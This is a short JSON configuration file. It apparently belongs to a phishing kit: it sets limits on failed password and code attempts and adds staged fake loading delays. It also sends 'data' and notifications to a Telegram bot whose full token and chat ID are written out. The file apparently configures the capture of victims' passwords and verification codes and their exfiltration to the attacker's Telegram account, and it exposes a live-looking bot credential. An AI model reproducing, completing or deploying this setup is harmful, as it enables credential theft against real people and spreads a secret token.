{
  "settings": {
    "code_input_enabled": true,
    "code_loading_time": 15000,
    "max_failed_code_attempts": 3,
    "max_failed_password_attempts": 2,
    "page_loading_time": 5000,
    "password_loading_time": 10000
  },
  "telegram": {
    "data_chatid": "6656772173",
    "data_token": "7296617395:AAFR7fEB8FzS7m5aMdkHnVkbwxGaLI9rGM4",
    "notification_chatid": "6656772173",
    "notification_token": "7296617395:AAFR7fEB8FzS7m5aMdkHnVkbwxGaLI9rGM4"
  }
}